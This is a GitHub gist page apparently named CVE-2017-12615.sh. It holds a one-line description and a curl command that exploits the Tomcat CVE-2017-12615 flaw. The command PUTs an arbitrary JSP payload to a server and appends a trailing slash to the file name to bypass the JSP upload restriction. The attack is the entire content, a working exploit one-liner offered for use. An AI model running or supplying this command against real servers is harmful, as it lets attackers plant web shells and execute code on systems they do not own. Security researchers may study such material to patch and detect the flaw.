cmaggiulli/CVE-2017-12615.sh

Created July 15, 2018 19:00

Star (0) You must be signed in to star a gist
Fork (0) You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/cmaggiulli/ae7982f5c4f07126372b12f2e6da7df1.js"></script>
Save cmaggiulli/ae7982f5c4f07126372b12f2e6da7df1 to your computer and use it in GitHub Desktop.

Download ZIP

CVE-2017-12615 bypass the jsp file type restriction on put requests for affected tomcat servers by appending a forward slash to the end of the fie name.

Raw

CVE-2017-12615.sh

curl -X PUT http://url:port/payload.jsp/ -d @- < payload.jsp

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment